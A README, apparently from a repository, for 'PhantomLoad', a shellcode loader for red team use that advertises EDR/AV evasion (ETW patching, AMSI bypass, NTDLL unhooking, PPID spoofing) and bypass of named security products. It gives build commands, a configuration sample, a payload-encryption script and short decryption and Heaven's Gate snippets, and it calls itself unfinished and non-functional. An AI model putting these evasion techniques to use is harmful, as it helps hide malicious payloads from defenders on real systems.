
⚠️ This project is not complete and is not ready for use. It is merely an extremely theoretical and poorly developed idea, practically just scribbles with no functionality and no modifications to put the idea into practice. ⚠️

🔌 PhantomLoad: Advanced Modular Shellcode Loader

A stealthy, fileless shellcode loader for Red Team operations with EDR/AV evasion capabilities.



📖 Overview

PhantomLoad is a cutting-edge shellcode loader designed for advanced Red Team engagements, featuring:

  • 100% fileless memory execution
  • EDR/AV evasion via syscall unhooking, ETW patching, and PPID spoofing
  • Modular design with runtime configuration system
  • Standalone cryptography (no OpenSSL dependencies)
  • Support for Cobalt Strike, Meterpreter, and BruteRatel payloads

🔬 Research Use Only | 🛡️ Bypasses Defender, CrowdStrike, SentinelOne


🚀 Features

Core Capabilities

| Category | Techniques Implemented |
|-------------------|----------------------------------------------------------------------------------------|
| Execution | NtCreateThreadEx, QueueUserAPC, Process Hollowing, Thread Stack Spoofing |
| Evasion | NTDLL Unhooking, ETW Patching, AMSI Bypass, Dynamic API Hashing |
| Obfuscation | AES-256 Encryption, XOR Key Rotation, Staged Decryption, String Obfuscation |
| Anti-Analysis | Heaven's Gate (WoW64), Advanced Anti-VM, Sleep Masking, Hardware Breakpoint Detection |

Advanced Evasion Levels

```c
typedef enum _EVASION_MODE {
    EVASION_BASIC = 0,     // Essential techniques
    EVASION_ADVANCED,      // + Unhooking + Anti-VM
    EVASION_AGGRESSIVE,    // + PPID Spoofing + ETW Patch
    EVASION_STEALTH        // All techniques + maximum obfuscation
} EVASION_MODE;
```

🏗️ Project Structure

```text
PhantomLoad/
│
├── PhantomLoad.c        # Main loader logic
├── Config.h             # Runtime configuration system
├── Evasion.h            # Advanced anti-EDR techniques
├── Crypto.h             # Standalone AES-256 + XOR cryptography
├── Utils.h              # Utilities & PPID spoofing
├── Syscalls.asm         # Direct syscalls with spoofing
└── Build.bat            # Automated compilation script
```

⚡ Quick Start

Prerequisites

  • Visual Studio 2022 (MSVC compiler) or MinGW
  • Windows SDK (10.0.19041.0 or later)
  • NASM (for assembly compilation)

Compilation

```bat
cl.exe PhantomLoad.c /I. /GS- /Os /MT /Fe:PhantomLoad_x64.exe
nasm -f win64 Syscalls.asm -o Syscalls.obj
link PhantomLoad.obj Syscalls.obj /OUT:PhantomLoad.exe /SUBSYSTEM:WINDOWS
```

Configuration

Edit Config.h to customize behavior:

```c
// Evasion settings
.evasionMode = EVASION_AGGRESSIVE,
.usePPIDSpoofing = TRUE,
.spoofedPPID = 1337,          // Explorer.exe PID
.patchETW = TRUE,
.disableAMSI = TRUE,

// Execution settings
.executionMode = EXEC_NT_CREATE_THREAD,
.useRWXMemory = TRUE,
.cleanMemory = TRUE,

// Cryptography settings
.cryptoMode = CRYPTO_STAGED_DECRYPT,
.aesKey = "YourAES256KeyHere",
.xorKey = 0xDEADBEEF,
```

Usage

  1. Encrypt your shellcode (Python example):

```python
from Crypto.Cipher import AES  # pycryptodome
import os

shellcode = b"\x90\x90\x90\x90"  # placeholder bytes; replace with the payload to protect

key = os.urandom(32)  # AES-256 key; the same 32 bytes must be carried over to .aesKey in Config.h
cipher = AES.new(key, AES.MODE_ECB)
# zero-pad up to the next 16-byte boundary (AES block size); the loader strips the trailing zeros
padded_shellcode = shellcode + b'\x00' * (16 - len(shellcode) % 16)
encrypted_payload = cipher.encrypt(padded_shellcode)
```

  2. Update the payload in PhantomLoad.c:

```c
unsigned char encryptedPayload[] = { 0x12, 0x34, ... };
```

  3. Execute (fileless):

```bat
PhantomLoad.exe
```

🛡️ Defensive Considerations

| Technique | Detection Mitigation |
|---------------------|-------------------------------------------------|
| Syscall Unhooking | Return address spoofing + dynamic resolution |
| PPID Spoofing | Parent command line spoofing + attribute lists |
| ETW Patching | Multiple ETW function patching |
| Sleep Masking | NtDelayExecution + fake CPU workload |
| Memory Protection | Section permission restoration + RX transition |

🔧 Advanced Features

Staged Decryption

```c
// Three-stage decryption process
void StagedDecrypt(unsigned char* payload, size_t size, const unsigned char* key) {
    XORDecrypt(payload, size, 0xDEADBEEF);                   // Stage 1: XOR
    AESDecrypt(payload, size, key);                          // Stage 2: AES-256
    XORDoubleDecrypt(payload, size, 0xDEADBEEF, 0xCAFEBABE); // Stage 3: XOR Duplex
}
```

Heaven's Gate WoW64

```nasm
; Transition from x86 to x64 mode (assembled as 32-bit code, so the stack pointer is esp, not rsp)
global HeavensGate
HeavensGate:
    push 0x33                   ; x64 code segment selector
    call $+5                    ; Push return address
    add dword [esp], 9          ; Adjust the pushed address to the x64 entry point
    retf                        ; Far return to x64 mode
```

📜 Legal Disclaimer

⚠️ WARNING: This project is for authorized security testing and academic research only.

  • Usage for attacking targets without prior mutual consent is illegal.
  • It is the end user's responsibility to obey all applicable laws.
  • Developers assume no liability and are not responsible for any misuse or damage caused by this program.
  • This software is provided "as is" without warranty of any kind.

🔒 Responsible Disclosure

  • This tool is intended for:
    • Authorized penetration testing
    • Red team exercises with proper authorization
    • Security research and education
    • Defense validation in controlled environments
